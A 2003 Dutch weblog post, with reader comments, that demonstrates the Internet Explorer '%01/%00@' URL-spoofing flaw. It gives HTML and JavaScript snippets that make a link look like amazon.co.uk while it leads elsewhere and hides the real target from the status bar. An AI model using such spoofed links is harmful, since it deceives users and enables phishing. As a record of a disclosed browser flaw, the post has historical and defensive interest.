Akelig

Gepost op vrijdag 19 december 2003 om 13:37 in (geen categorie). Geef uw opinie hieronder. Trackbacks zijn gesloten voor deze entry, sorry.

That’s some scary shit right there man:

maak een html-document aan, smijt daarin dit javascript:

<script language=”javascript”>
document.write(unescape(’http://www.amazon.co.uk%01@www.zog.org’));
</script>
opendoen in browser, en dan het resultaat copiëren, dat zou er iets in deze zin moeten uitzien (met zo’n blokje in het midden):

http://www.amazon.co.uk@www.zog.org
gebruik de gekopieerde URL, met %01 proper geëncodeerd, in een andere html-file:

<a href=”http://www.amazon.co.uk@www.zog.org”>gr8!</a>
in de statusbalk is de “echte” link nog wel zichtbaar, maar da’s ook rap verholpen door vóór de geëncodeerde %01 een %00 te zetten, alsdus:

<a href=”http://www.amazon.co.uk%00@www.zog.org”>wassup?</a>
resultaat van al dat moois: yo check it — ik heb amazon gekaapt!

1. Laurens zei, op vrijdag 19 december 2003 om 14u16:
Dat de statusbalk verkeerd is, tot daar aan toe, maar dat hij bij het parsen van de HTML-code los over die “http://www.amazon.co.uk%00@” leest en de link naar zog.org maakt…straf! Werkt dat bij Mozilla/Netscape/Safari ook?
2. Laurens@school zei, op vrijdag 19 december 2003 om 16u33:
http://slashdot.org/articles/03/12/19/0135211.shtml?tid=113&tid=126&tid=128&tid=172&tid=95

Er is dus een open-source patch. De vraag is: hoe is de programmeur van die patch aan de source van IE geraakt? En bovendien is er het gerucht dat de patch er voor zorgt dat elke bezochte url gevalideerd wordt op een server, en bovendien zit er een buffer overflow in. Probleem: MS kan nu niet dezelfde code gebruiken om het probleem op te lossen. Dus het zal nog wel even duren voordat er een MS patch komt. Grm!
3. Michel Vuijlsteke zei, op vrijdag 19 december 2003 om 16u38:
“open source patch” — yeah right. Dat zal ik alleen vertrouwen als ik de source zelf compileer, en dan nog!

Michel Vuijlsteke’s weblog